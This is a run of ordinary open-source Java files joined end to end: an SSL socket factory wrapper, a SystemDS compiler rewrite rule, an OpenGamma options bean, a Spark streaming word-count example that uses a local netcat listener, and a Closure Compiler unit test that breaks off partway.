        public Socket createSocket(Socket s, String host,
                                   int port, boolean autoClose) throws IOException, UnknownHostException {
            return configureSocket(sslSocketFactory.createSocket(s, host, port, autoClose));
        }

        @Override
        public Socket createSocket(String host, int port) throws IOException, UnknownHostException {
            return configureSocket(sslSocketFactory.createSocket(host, port));
        }

        @Override
        public Socket createSocket(String host, int port,
                                   InetAddress localHost, int localPort) throws IOException, UnknownHostException {
            return configureSocket(sslSocketFactory.createSocket(host, port, localHost, localPort));
        }

        @Override
        public Socket createSocket(InetAddress host, int port) throws IOException {
            return configureSocket(sslSocketFactory.createSocket(host, port));
        }

        @Override
        public Socket createSocket(InetAddress address, int port,
                                   InetAddress localAddress, int localPort) throws IOException {
            return configureSocket(sslSocketFactory.createSocket(address, port, localAddress, localPort));
        }

        public SSLSocketFactory getDelegate() {
            return this.sslSocketFactory;
        }

        // Applies every registered configurer to a newly created socket.
        // NOTE(review): assumes the delegate factory always produces SSLSocket
        // instances (the cast below would otherwise throw ClassCastException).
        private Socket configureSocket(Socket s) {
            SSLSocket workingSocket = (SSLSocket) s;

            LOG.debug("Created Socket [{}] from SocketFactory [{}].", s, sslSocketFactory);

            for (Configurer<SSLSocket> configurer : this.sslSocketConfigurers) {
                workingSocket = configurer.configure(workingSocket);
            }

            return workingSocket;
        }
    }

    // Builds the parameterized debug-log template used when configuring cipher
    // suites on the named entity (SSLEngine/SSLSocket/SSLServerSocket).
    private static String createCipherSuiteLogMessage(String entityName) {
        return "Configuring " + entityName + " [{}] with " + LS
                + "\t explicitly set cipher suites [{}]," + LS
                + "\t cipher suite patterns [{}]," + LS
                + "\t available cipher suites [{}]," + LS
                + "\t currently enabled cipher suites [{}]," + LS
                + "\t and default cipher suite patterns [{}]." + LS
                + "\t Resulting enabled cipher suites are [{}].";
    }

    // Builds the parameterized debug-log template used when configuring
    // protocols on the named entity (SSLEngine/SSLSocket/SSLServerSocket).
    private static String createProtocolLogMessage(String entityName) {
        return "Configuring " + entityName + " [{}] with " + LS
                + "\t explicitly set protocols [{}]," + LS
                + "\t protocol patterns [{}]," + LS
                + "\t available protocols [{}]," + LS
                + "\t currently enabled protocols [{}]," + LS
                + "\t and default protocol patterns [{}]." + LS
                + "\t Resulting enabled protocols are [{}].";
    }
}
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.sysds.hops.rewrite; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import org.apache.sysds.api.DMLScript; import org.apache.sysds.common.Types.ExecMode; import org.apache.sysds.common.Types.OpOp1; import org.apache.sysds.common.Types.OpOpData; import org.apache.sysds.hops.DataOp; import org.apache.sysds.hops.FunctionOp; import org.apache.sysds.hops.Hop; import org.apache.sysds.hops.LeftIndexingOp; import org.apache.sysds.hops.UnaryOp; import org.apache.sysds.parser.ForStatement; import org.apache.sysds.parser.ForStatementBlock; import org.apache.sysds.parser.IfStatement; import org.apache.sysds.parser.IfStatementBlock; import org.apache.sysds.parser.StatementBlock; import org.apache.sysds.parser.VariableSet; import org.apache.sysds.parser.WhileStatement; import org.apache.sysds.parser.WhileStatementBlock; import org.apache.sysds.common.Types.DataType; /** * Rule: Mark loop variables that are only read/updated through cp left indexing * for update in-place. 
 */
public class RewriteMarkLoopVariablesUpdateInPlace extends StatementBlockRewriteRule {

	@Override
	public boolean createsSplitDag() {
		// pure marking rewrite; never splits statement-block DAGs
		return false;
	}

	@Override
	public List<StatementBlock> rewriteStatementBlock(StatementBlock sb, ProgramRewriteStatus status) {
		if( DMLScript.getGlobalExecMode() == ExecMode.SPARK ) {
			// nothing to do here, return original statement block
			return Arrays.asList(sb);
		}

		if( sb instanceof WhileStatementBlock || sb instanceof ForStatementBlock ) //incl parfor
		{
			// candidate loop variables for update-in-place marking
			ArrayList<String> candidates = new ArrayList<>();
			VariableSet updated = sb.variablesUpdated();
			VariableSet liveout = sb.liveOut();
			for( String varname : updated.getVariableNames() ) {
				// only matrices that are live-out qualify (exclude local vars)
				if( updated.getVariable(varname).getDataType()==DataType.MATRIX
					&& liveout.containsVariable(varname) ) //exclude local vars
				{
					if( sb instanceof WhileStatementBlock ) {
						WhileStatement wstmt = (WhileStatement) sb.getStatement(0);
						if( rIsApplicableForUpdateInPlace(wstmt.getBody(), varname) )
							candidates.add(varname);
					}
					else if( sb instanceof ForStatementBlock ) {
						ForStatement wstmt = (ForStatement) sb.getStatement(0);
						if( rIsApplicableForUpdateInPlace(wstmt.getBody(), varname) )
							candidates.add(varname);
					}
				}
			}
			sb.setUpdateInPlaceVars(candidates);
		}

		//return modified statement block
		return Arrays.asList(sb);
	}

	/**
	 * Recursively checks all statement blocks of a loop body for safe
	 * (left-indexing-only) access to the given variable.
	 *
	 * @param sbs the statement blocks of the loop body
	 * @param varname the candidate loop variable
	 * @return true if the variable is only read/updated via left indexing
	 */
	private boolean rIsApplicableForUpdateInPlace( ArrayList<StatementBlock> sbs, String varname )
	{
		//NOTE: no function statement blocks / predicates considered because function call would
		//render variable as not applicable and predicates don't allow assignments; further reuse
		//of loop candidates as child blocks already processed

		//recursive invocation
		boolean ret = true;
		for( StatementBlock sb : sbs ) {
			if( !sb.variablesRead().containsVariable(varname)
				&& !sb.variablesUpdated().containsVariable(varname) )
				continue; //valid wrt update-in-place

			if( sb instanceof WhileStatementBlock || sb instanceof ForStatementBlock ) {
				// nested loops: reuse already-computed candidate marking
				ret &= sb.getUpdateInPlaceVars().contains(varname);
			}
			else if( sb instanceof IfStatementBlock ) {
				// both branches must be applicable
				IfStatementBlock isb = (IfStatementBlock) sb;
				IfStatement istmt = (IfStatement)isb.getStatement(0);
				ret &= rIsApplicableForUpdateInPlace(istmt.getIfBody(), varname);
				if( ret && istmt.getElseBody() != null )
					ret &= rIsApplicableForUpdateInPlace(istmt.getElseBody(), varname);
			}
			else {
				// generic last-level block: DAG-level check first, then per-root check
				if( sb.getHops() != null )
					if( !isApplicableForUpdateInPlace(sb.getHops(), varname) )
						for( Hop hop : sb.getHops() )
							ret &= isApplicableForUpdateInPlace(hop, varname);
			}

			//early abort if not applicable
			if( !ret ) break;
		}

		return ret;
	}

	/**
	 * Single-root-level validity check: the variable must only be read/updated
	 * through left indexing with only safe (nrow/ncol) secondary consumers.
	 *
	 * @param hop a DAG root
	 * @param varname the candidate variable
	 * @return true if this root is applicable for update-in-place
	 */
	private static boolean isApplicableForUpdateInPlace(Hop hop, String varname)
	{
		// check erroneously marking a variable for update-in-place
		// that is written to by a function return value
		if(hop instanceof FunctionOp && ((FunctionOp)hop).containsOutput(varname))
			return false;

		//NOTE: single-root-level validity check
		if( !hop.getName().equals(varname) )
			return true;

		//valid if read/updated by leftindexing
		//CP exec type not evaluated here as no lops generated yet
		boolean validLix = probeLixRoot(hop, varname);

		//valid if only safe consumers of left indexing input
		if( validLix ) {
			for( Hop p : hop.getInput().get(0).getInput().get(0).getParent() ) {
				validLix &= (  p == hop.getInput().get(0) //lix
					|| (p instanceof UnaryOp && ((UnaryOp)p).getOp()==OpOp1.NROW)
					|| (p instanceof UnaryOp && ((UnaryOp)p).getOp()==OpOp1.NCOL));
			}
		}

		return validLix;
	}

	/**
	 * DAG-level validity check: at most one left-indexing update of the variable,
	 * and all other roots independent of it.
	 *
	 * @param hops the DAG roots of a statement block
	 * @param varname the candidate variable
	 * @return true if the DAG is applicable for update-in-place
	 */
	private static boolean isApplicableForUpdateInPlace(ArrayList<Hop> hops, String varname)
	{
		//NOTE: additional DAG-level validity check

		// check single LIX update which is direct root-child to varname assignment
		Hop bLix = null;
		for( Hop hop : hops ) {
			if( probeLixRoot(hop, varname) ) {
				if( bLix != null )
					return false; //invalid
				bLix = hop.getInput().get(0);
			}
		}

		// check all other roots independent of varname
		boolean valid = true;
		Hop.resetVisitStatus(hops);
		for( Hop hop : hops )
			if( hop.getInput().get(0) != bLix )
				valid &= rProbeOtherRoot(hop, varname);
		Hop.resetVisitStatus(hops);

		return valid;
	}

	// true if the root is a transient write of varname fed directly by a
	// left-indexing op over varname itself
	private static boolean probeLixRoot(Hop root, String varname) {
		return root instanceof DataOp
			&& root.isMatrix() && root.getInput().get(0).isMatrix()
			&& root.getInput().get(0) instanceof LeftIndexingOp
			&& root.getInput().get(0).getInput().get(0) instanceof DataOp
			&& root.getInput().get(0).getInput().get(0).getName().equals(varname);
	}

	// recursively verifies that a DAG contains no left indexing and no
	// transient read of varname (uses visit status to avoid re-traversal)
	private static boolean rProbeOtherRoot(Hop hop, String varname) {
		if( hop.isVisited() )
			return false;

		boolean valid = !(hop instanceof LeftIndexingOp)
			&& !(HopRewriteUtils.isData(hop, OpOpData.TRANSIENTREAD) && hop.getName().equals(varname));
		for( Hop c : hop.getInput() )
			valid &= rProbeOtherRoot(c, varname);

		hop.setVisited();
		return valid;
	}

	@Override
	public List<StatementBlock> rewriteStatementBlocks(List<StatementBlock> sbs, ProgramRewriteStatus sate) {
		// DAG-list rewrite not applicable; pass through unchanged
		return sbs;
	}
}
/**
 * Copyright (C) 2009 - present by OpenGamma Inc. and the OpenGamma group of companies
 *
 * Please see distribution for license.
 */
package com.opengamma.financial.security.option;

import java.util.Map;

import org.joda.beans.Bean;
import org.joda.beans.BeanBuilder;
import org.joda.beans.BeanDefinition;
import org.joda.beans.JodaBeanUtils;
import org.joda.beans.MetaProperty;
import org.joda.beans.Property;
import org.joda.beans.PropertyDefinition;
import org.joda.beans.impl.direct.DirectBeanBuilder;
import org.joda.beans.impl.direct.DirectMetaProperty;
import org.joda.beans.impl.direct.DirectMetaPropertyMap;
import org.threeten.bp.ZonedDateTime;

import com.opengamma.util.time.Expiry;

/**
 * The simple chooser payoff style.
 * <p>
 * A mutable Joda-Bean; the section between the AUTOGENERATED markers is
 * produced by the Joda-Beans code generator and should not be edited by hand.
 */
@BeanDefinition
public class SimpleChooserPayoffStyle extends PayoffStyle {

  /** Serialization version. */
  private static final long serialVersionUID = 1L;

  /**
   * The choose date.
   */
  @PropertyDefinition(validate = "notNull")
  private ZonedDateTime _chooseDate;
  /**
   * The underlying strike.
   */
  @PropertyDefinition
  private double _underlyingStrike;
  /**
   * The underlying expiry.
   */
  @PropertyDefinition(validate = "notNull")
  private Expiry _underlyingExpiry;

  /**
   * Creates an instance.
   */
  private SimpleChooserPayoffStyle() {
  }

  /**
   * Creates an instance.
   *
   * @param chooseDate the choose date, not null
   * @param underlyingStrike the underlying strike
   * @param underlyingExpiry the underlying expiry, not null
   */
  public SimpleChooserPayoffStyle(final ZonedDateTime chooseDate, final double underlyingStrike, final Expiry underlyingExpiry) {
    setChooseDate(chooseDate);
    setUnderlyingStrike(underlyingStrike);
    setUnderlyingExpiry(underlyingExpiry);
  }

  //-------------------------------------------------------------------------
  @Override
  public <T> T accept(final PayoffStyleVisitor<T> visitor) {
    return visitor.visitSimpleChooserPayoffStyle(this);
  }

  //------------------------- AUTOGENERATED START -------------------------
  ///CLOVER:OFF
  /**
   * The meta-bean for {@code SimpleChooserPayoffStyle}.
   * @return the meta-bean, not null
   */
  public static SimpleChooserPayoffStyle.Meta meta() {
    return SimpleChooserPayoffStyle.Meta.INSTANCE;
  }

  static {
    JodaBeanUtils.registerMetaBean(SimpleChooserPayoffStyle.Meta.INSTANCE);
  }

  @Override
  public SimpleChooserPayoffStyle.Meta metaBean() {
    return SimpleChooserPayoffStyle.Meta.INSTANCE;
  }

  //-----------------------------------------------------------------------
  /**
   * Gets the choose date.
   * @return the value of the property, not null
   */
  public ZonedDateTime getChooseDate() {
    return _chooseDate;
  }

  /**
   * Sets the choose date.
   * @param chooseDate the new value of the property, not null
   */
  public void setChooseDate(ZonedDateTime chooseDate) {
    JodaBeanUtils.notNull(chooseDate, "chooseDate");
    this._chooseDate = chooseDate;
  }

  /**
   * Gets the {@code chooseDate} property.
   * @return the property, not null
   */
  public final Property<ZonedDateTime> chooseDate() {
    return metaBean().chooseDate().createProperty(this);
  }

  //-----------------------------------------------------------------------
  /**
   * Gets the underlying strike.
   * @return the value of the property
   */
  public double getUnderlyingStrike() {
    return _underlyingStrike;
  }

  /**
   * Sets the underlying strike.
   * @param underlyingStrike the new value of the property
   */
  public void setUnderlyingStrike(double underlyingStrike) {
    this._underlyingStrike = underlyingStrike;
  }

  /**
   * Gets the {@code underlyingStrike} property.
   * @return the property, not null
   */
  public final Property<Double> underlyingStrike() {
    return metaBean().underlyingStrike().createProperty(this);
  }

  //-----------------------------------------------------------------------
  /**
   * Gets the underlying expiry.
   * @return the value of the property, not null
   */
  public Expiry getUnderlyingExpiry() {
    return _underlyingExpiry;
  }

  /**
   * Sets the underlying expiry.
   * @param underlyingExpiry the new value of the property, not null
   */
  public void setUnderlyingExpiry(Expiry underlyingExpiry) {
    JodaBeanUtils.notNull(underlyingExpiry, "underlyingExpiry");
    this._underlyingExpiry = underlyingExpiry;
  }

  /**
   * Gets the {@code underlyingExpiry} property.
   * @return the property, not null
   */
  public final Property<Expiry> underlyingExpiry() {
    return metaBean().underlyingExpiry().createProperty(this);
  }

  //-----------------------------------------------------------------------
  @Override
  public SimpleChooserPayoffStyle clone() {
    return JodaBeanUtils.cloneAlways(this);
  }

  @Override
  public boolean equals(Object obj) {
    if (obj == this) {
      return true;
    }
    if (obj != null && obj.getClass() == this.getClass()) {
      SimpleChooserPayoffStyle other = (SimpleChooserPayoffStyle) obj;
      return JodaBeanUtils.equal(getChooseDate(), other.getChooseDate()) &&
          JodaBeanUtils.equal(getUnderlyingStrike(), other.getUnderlyingStrike()) &&
          JodaBeanUtils.equal(getUnderlyingExpiry(), other.getUnderlyingExpiry()) &&
          super.equals(obj);
    }
    return false;
  }

  @Override
  public int hashCode() {
    int hash = 7;
    hash = hash * 31 + JodaBeanUtils.hashCode(getChooseDate());
    hash = hash * 31 + JodaBeanUtils.hashCode(getUnderlyingStrike());
    hash = hash * 31 + JodaBeanUtils.hashCode(getUnderlyingExpiry());
    return hash ^ super.hashCode();
  }

  @Override
  public String toString() {
    StringBuilder buf = new StringBuilder(128);
    buf.append("SimpleChooserPayoffStyle{");
    int len = buf.length();
    toString(buf);
    if (buf.length() > len) {
      buf.setLength(buf.length() - 2);
    }
    buf.append('}');
    return buf.toString();
  }

  @Override
  protected void toString(StringBuilder buf) {
    super.toString(buf);
    buf.append("chooseDate").append('=').append(JodaBeanUtils.toString(getChooseDate())).append(',').append(' ');
    buf.append("underlyingStrike").append('=').append(JodaBeanUtils.toString(getUnderlyingStrike())).append(',').append(' ');
    buf.append("underlyingExpiry").append('=').append(JodaBeanUtils.toString(getUnderlyingExpiry())).append(',').append(' ');
  }

  //-----------------------------------------------------------------------
  /**
   * The meta-bean for {@code SimpleChooserPayoffStyle}.
   */
  public static class Meta extends PayoffStyle.Meta {
    /**
     * The singleton instance of the meta-bean.
     */
    static final Meta INSTANCE = new Meta();

    /**
     * The meta-property for the {@code chooseDate} property.
     */
    private final MetaProperty<ZonedDateTime> _chooseDate = DirectMetaProperty.ofReadWrite(
        this, "chooseDate", SimpleChooserPayoffStyle.class, ZonedDateTime.class);
    /**
     * The meta-property for the {@code underlyingStrike} property.
     */
    private final MetaProperty<Double> _underlyingStrike = DirectMetaProperty.ofReadWrite(
        this, "underlyingStrike", SimpleChooserPayoffStyle.class, Double.TYPE);
    /**
     * The meta-property for the {@code underlyingExpiry} property.
     */
    private final MetaProperty<Expiry> _underlyingExpiry = DirectMetaProperty.ofReadWrite(
        this, "underlyingExpiry", SimpleChooserPayoffStyle.class, Expiry.class);
    /**
     * The meta-properties.
     */
    private final Map<String, MetaProperty<?>> _metaPropertyMap$ = new DirectMetaPropertyMap(
        this, (DirectMetaPropertyMap) super.metaPropertyMap(),
        "chooseDate",
        "underlyingStrike",
        "underlyingExpiry");

    /**
     * Restricted constructor.
     */
    protected Meta() {
    }

    @Override
    protected MetaProperty<?> metaPropertyGet(String propertyName) {
      switch (propertyName.hashCode()) {
        case 2023159397:  // chooseDate
          return _chooseDate;
        case 205707631:  // underlyingStrike
          return _underlyingStrike;
        case -191465744:  // underlyingExpiry
          return _underlyingExpiry;
      }
      return super.metaPropertyGet(propertyName);
    }

    @Override
    public BeanBuilder<? extends SimpleChooserPayoffStyle> builder() {
      return new DirectBeanBuilder<SimpleChooserPayoffStyle>(new SimpleChooserPayoffStyle());
    }

    @Override
    public Class<? extends SimpleChooserPayoffStyle> beanType() {
      return SimpleChooserPayoffStyle.class;
    }

    @Override
    public Map<String, MetaProperty<?>> metaPropertyMap() {
      return _metaPropertyMap$;
    }

    //-----------------------------------------------------------------------
    /**
     * The meta-property for the {@code chooseDate} property.
     * @return the meta-property, not null
     */
    public final MetaProperty<ZonedDateTime> chooseDate() {
      return _chooseDate;
    }

    /**
     * The meta-property for the {@code underlyingStrike} property.
     * @return the meta-property, not null
     */
    public final MetaProperty<Double> underlyingStrike() {
      return _underlyingStrike;
    }

    /**
     * The meta-property for the {@code underlyingExpiry} property.
     * @return the meta-property, not null
     */
    public final MetaProperty<Expiry> underlyingExpiry() {
      return _underlyingExpiry;
    }

    //-----------------------------------------------------------------------
    @Override
    protected Object propertyGet(Bean bean, String propertyName, boolean quiet) {
      switch (propertyName.hashCode()) {
        case 2023159397:  // chooseDate
          return ((SimpleChooserPayoffStyle) bean).getChooseDate();
        case 205707631:  // underlyingStrike
          return ((SimpleChooserPayoffStyle) bean).getUnderlyingStrike();
        case -191465744:  // underlyingExpiry
          return ((SimpleChooserPayoffStyle) bean).getUnderlyingExpiry();
      }
      return super.propertyGet(bean, propertyName, quiet);
    }

    @Override
    protected void propertySet(Bean bean, String propertyName, Object newValue, boolean quiet) {
      switch (propertyName.hashCode()) {
        case 2023159397:  // chooseDate
          ((SimpleChooserPayoffStyle) bean).setChooseDate((ZonedDateTime) newValue);
          return;
        case 205707631:  // underlyingStrike
          ((SimpleChooserPayoffStyle) bean).setUnderlyingStrike((Double) newValue);
          return;
        case -191465744:  // underlyingExpiry
          ((SimpleChooserPayoffStyle) bean).setUnderlyingExpiry((Expiry) newValue);
          return;
      }
      super.propertySet(bean, propertyName, newValue, quiet);
    }

    @Override
    protected void validate(Bean bean) {
      JodaBeanUtils.notNull(((SimpleChooserPayoffStyle) bean)._chooseDate, "chooseDate");
      JodaBeanUtils.notNull(((SimpleChooserPayoffStyle) bean)._underlyingExpiry, "underlyingExpiry");
      super.validate(bean);
    }

  }

  ///CLOVER:ON
  //-------------------------- AUTOGENERATED END --------------------------
}
/*
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements. See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License. You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package org.apache.spark.examples.streaming;

import java.io.File;
import java.io.IOException;
import java.nio.charset.Charset;
import java.util.Arrays;
import java.util.Iterator;
import java.util.List;
import java.util.regex.Pattern;

import scala.Tuple2;
import com.google.common.io.Files;

import org.apache.spark.SparkConf;
import org.apache.spark.api.java.JavaPairRDD;
import org.apache.spark.api.java.JavaSparkContext;
import org.apache.spark.api.java.function.*;
import org.apache.spark.broadcast.Broadcast;
import org.apache.spark.streaming.Durations;
import org.apache.spark.streaming.Time;
import org.apache.spark.streaming.api.java.JavaDStream;
import org.apache.spark.streaming.api.java.JavaPairDStream;
import org.apache.spark.streaming.api.java.JavaReceiverInputDStream;
import org.apache.spark.streaming.api.java.JavaStreamingContext;
import org.apache.spark.util.LongAccumulator;

/**
 * Use this singleton to get or register a Broadcast variable.
 * Lazy initialization with double-checked locking on the volatile instance
 * field, so the broadcast is re-registered after driver recovery.
 */
class JavaWordBlacklist {

  private static volatile Broadcast<List<String>> instance = null;

  public static Broadcast<List<String>> getInstance(JavaSparkContext jsc) {
    if (instance == null) {
      synchronized (JavaWordBlacklist.class) {
        if (instance == null) {
          List<String> wordBlacklist = Arrays.asList("a", "b", "c");
          instance = jsc.broadcast(wordBlacklist);
        }
      }
    }
    return instance;
  }
}

/**
 * Use this singleton to get or register an Accumulator.
 * Same lazy double-checked-locking pattern as {@link JavaWordBlacklist}.
 */
class JavaDroppedWordsCounter {

  private static volatile LongAccumulator instance = null;

  public static LongAccumulator getInstance(JavaSparkContext jsc) {
    if (instance == null) {
      synchronized (JavaDroppedWordsCounter.class) {
        if (instance == null) {
          instance = jsc.sc().longAccumulator("WordsInBlacklistCounter");
        }
      }
    }
    return instance;
  }
}

/**
 * Counts words in text encoded with UTF8 received from the network every second. This example also
 * shows how to use lazily instantiated singleton instances for Accumulator and Broadcast so that
 * they can be registered on driver failures.
 *
 * Usage: JavaRecoverableNetworkWordCount <hostname> <port> <checkpoint-directory> <output-file>
 *   <hostname> and <port> describe the TCP server that Spark Streaming would connect to receive
 *   data. <checkpoint-directory> directory to HDFS-compatible file system which checkpoint data
 *   <output-file> file to which the word counts will be appended
 *
 * <checkpoint-directory> and <output-file> must be absolute paths
 *
 * To run this on your local machine, you need to first run a Netcat server
 *
 *      `$ nc -lk 9999`
 *
 * and run the example as
 *
 *      `$ ./bin/run-example org.apache.spark.examples.streaming.JavaRecoverableNetworkWordCount \
 *              localhost 9999 ~/checkpoint/ ~/out`
 *
 * If the directory ~/checkpoint/ does not exist (e.g. running for the first time), it will create
 * a new StreamingContext (will print "Creating new context" to the console). Otherwise, if
 * checkpoint data exists in ~/checkpoint/, then it will create StreamingContext from
 * the checkpoint data.
 *
 * Refer to the online documentation for more details.
 */
public final class JavaRecoverableNetworkWordCount {
  private static final Pattern SPACE = Pattern.compile(" ");

  /**
   * Builds a fresh streaming context (socket source, word count, checkpointed
   * output to a file). Only invoked when no checkpoint exists; on recovery the
   * context is deserialized from the checkpoint instead.
   *
   * @param ip TCP server host to read text from
   * @param port TCP server port
   * @param checkpointDirectory checkpoint directory (HDFS-compatible)
   * @param outputPath file that word counts are appended to
   * @return the newly created streaming context
   */
  private static JavaStreamingContext createContext(String ip,
                                                    int port,
                                                    String checkpointDirectory,
                                                    String outputPath) {

    // If you do not see this printed, that means the StreamingContext has been loaded
    // from the new checkpoint
    System.out.println("Creating new context");
    final File outputFile = new File(outputPath);
    if (outputFile.exists()) {
      // best-effort delete of a stale output file; failure is non-fatal since
      // Files.append below would simply continue appending
      outputFile.delete();
    }
    SparkConf sparkConf = new SparkConf().setAppName("JavaRecoverableNetworkWordCount");
    // Create the context with a 1 second batch size
    JavaStreamingContext ssc = new JavaStreamingContext(sparkConf, Durations.seconds(1));
    ssc.checkpoint(checkpointDirectory);

    // Create a socket stream on target ip:port and count the
    // words in input stream of \n delimited text (eg. generated by 'nc')
    JavaReceiverInputDStream<String> lines = ssc.socketTextStream(ip, port);
    JavaDStream<String> words = lines.flatMap(new FlatMapFunction<String, String>() {
      @Override
      public Iterator<String> call(String x) {
        return Arrays.asList(SPACE.split(x)).iterator();
      }
    });
    JavaPairDStream<String, Integer> wordCounts = words.mapToPair(
      new PairFunction<String, String, Integer>() {
        @Override
        public Tuple2<String, Integer> call(String s) {
          return new Tuple2<>(s, 1);
        }
      }).reduceByKey(new Function2<Integer, Integer, Integer>() {
        @Override
        public Integer call(Integer i1, Integer i2) {
          return i1 + i2;
        }
      });

    wordCounts.foreachRDD(new VoidFunction2<JavaPairRDD<String, Integer>, Time>() {
      @Override
      public void call(JavaPairRDD<String, Integer> rdd, Time time) throws IOException {
        // Get or register the blacklist Broadcast
        final Broadcast<List<String>> blacklist =
            JavaWordBlacklist.getInstance(new JavaSparkContext(rdd.context()));
        // Get or register the droppedWordsCounter Accumulator
        final LongAccumulator droppedWordsCounter =
            JavaDroppedWordsCounter.getInstance(new JavaSparkContext(rdd.context()));
        // Use blacklist to drop words and use droppedWordsCounter to count them
        String counts = rdd.filter(new Function<Tuple2<String, Integer>, Boolean>() {
          @Override
          public Boolean call(Tuple2<String, Integer> wordCount) {
            if (blacklist.value().contains(wordCount._1())) {
              droppedWordsCounter.add(wordCount._2());
              return false;
            } else {
              return true;
            }
          }
        }).collect().toString();
        String output = "Counts at time " + time + " " + counts;
        System.out.println(output);
        System.out.println("Dropped " + droppedWordsCounter.value() + " word(s) totally");
        System.out.println("Appending to " + outputFile.getAbsolutePath());
        Files.append(output + "\n", outputFile, Charset.defaultCharset());
      }
    });
    return ssc;
  }

  public static void main(String[] args) throws Exception {
    if (args.length != 4) {
      // fix: "You arguments were" -> "Your arguments were" in the user-facing message
      System.err.println("Your arguments were " + Arrays.asList(args));
      System.err.println(
          "Usage: JavaRecoverableNetworkWordCount <hostname> <port> <checkpoint-directory>\n" +
          " <output-file>. <hostname> and <port> describe the TCP server that Spark\n" +
          " Streaming would connect to receive data. <checkpoint-directory> directory to\n" +
          " HDFS-compatible file system which checkpoint data <output-file> file to which\n" +
          " the word counts will be appended\n" +
          "\n" +
          "In local mode, <master> should be 'local[n]' with n > 1\n" +
          "Both <checkpoint-directory> and <output-file> must be absolute paths");
      System.exit(1);
    }

    final String ip = args[0];
    final int port = Integer.parseInt(args[1]);
    final String checkpointDirectory = args[2];
    final String outputPath = args[3];

    // Function to create JavaStreamingContext without any output operations
    // (used to detect the new context)
    Function0<JavaStreamingContext> createContextFunc = new Function0<JavaStreamingContext>() {
      @Override
      public JavaStreamingContext call() {
        return createContext(ip, port, checkpointDirectory, outputPath);
      }
    };

    // Reuse checkpointed context if present; otherwise build a new one
    JavaStreamingContext ssc =
        JavaStreamingContext.getOrCreate(checkpointDirectory, createContextFunc);
    ssc.start();
    ssc.awaitTermination();
  }
}
/*
 * Copyright 2009 The Closure Compiler Authors.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package com.google.javascript.jscomp;

/**
 * Unit tests for {@link OptimizeArgumentsArray}.
 *
 * Each test compares an input function using the {@code arguments} object
 * against the expected output where accesses are replaced by named
 * parameters (generated with prefix "p"); {@code testSame} asserts the pass
 * leaves the input untouched.
 */
public final class OptimizeArgumentsArrayTest extends CompilerTestCase {

  public OptimizeArgumentsArrayTest() {
    /*
     * arguments is a builtin variable of the javascript language and
     * OptimizeArgumentsArray does not make any attempt to resolve it. However,
     * I am leaving "var arguments" in the externs to emulate the current
     * behavior we have for JS compilation where var arguments is defined in
     * externs/es3.js as extern.
     */
    super("var arguments, alert" /* Externs */);
  }

  @Override
  protected CompilerPass getProcessor(Compiler compiler) {
    // "p" is the prefix used for generated parameter names in all expectations
    return new OptimizeArgumentsArray(compiler, "p");
  }

  public void testSimple() {
    test(
        "function foo() { alert(arguments[0]); }",
        "function foo(p0) { alert( p0); }");
  }

  public void testNoVarArgs() {
    testSame("function f(a,b,c) { alert(a + b + c) }");

    test(
        "function f(a,b,c) { alert(arguments[0]) }",
        "function f(a,b,c) { alert( a) }");
  }

  public void testMissingVarArgs() {
    // non-constant index: cannot be rewritten
    testSame("function f() { alert(arguments[x]) }");
  }

  public void testArgumentRefOnNamedParameter() {
    test("function f(a,b) { alert(arguments[0]) }",
         "function f(a,b) { alert(a) }");
  }

  public void testTwoVarArgs() {
    test(
        "function foo(a) { alert(arguments[1] + arguments[2]); }",
        "function foo(a, p0, p1) { alert( p0 + p1); }");
  }

  public void testTwoFourArgsTwoUsed() {
    test("function foo() { alert(arguments[0] + arguments[3]); }",
         "function foo(p0, p1, p2, p3) { alert(p0 + p3); }");
  }

  public void testOneRequired() {
    test("function foo(req0, var_args) { alert(req0 + arguments[1]); }",
         "function foo(req0, var_args) { alert(req0 + var_args); }");
  }

  public void testTwoRequiredSixthVarArgReferenced() {
    test("function foo(r0, r1, var_args) {alert(r0 + r1 + arguments[5]);}",
         "function foo(r0, r1, var_args, p0, p1, p2) { alert(r0 + r1 + p2); }");
  }

  public void testTwoRequiredOneOptionalFifthVarArgReferenced() {
    test("function foo(r0, r1, opt_1)" +
         " {alert(r0 + r1 + opt_1 + arguments[4]);}",
         "function foo(r0, r1, opt_1, p0, p1)" +
         " {alert(r0 + r1 + opt_1 + p1); }");
  }

  public void testTwoRequiredTwoOptionalSixthVarArgReferenced() {
    test("function foo(r0, r1, opt_1, opt_2)" +
         " {alert(r0 + r1 + opt_1 + opt_2 + arguments[5]);}",
         "function foo(r0, r1, opt_1, opt_2, p0, p1)" +
         " {alert(r0 + r1 + opt_1 + opt_2 + p1); }");
  }

  // Inner-function tests: each function gets its own arguments object, so
  // rewrites must stay scoped to the function that references arguments.

  public void testInnerFunctions() {
    test("function f() { function b( ) { arguments[0] }}",
         "function f() { function b(p0) { p0 }}");

    test("function f( ) { function b() { } arguments[0] }",
         "function f(p0) { function b() { } p0 }");

    test("function f( ) { arguments[0]; function b( ) { arguments[0] }}",
         "function f(p1) { p1; function b(p0) { p0 }}");
  }

  public void testInnerFunctionsWithNamedArgumentInInnerFunction() {
    test("function f() { function b(x ) { arguments[1] }}",
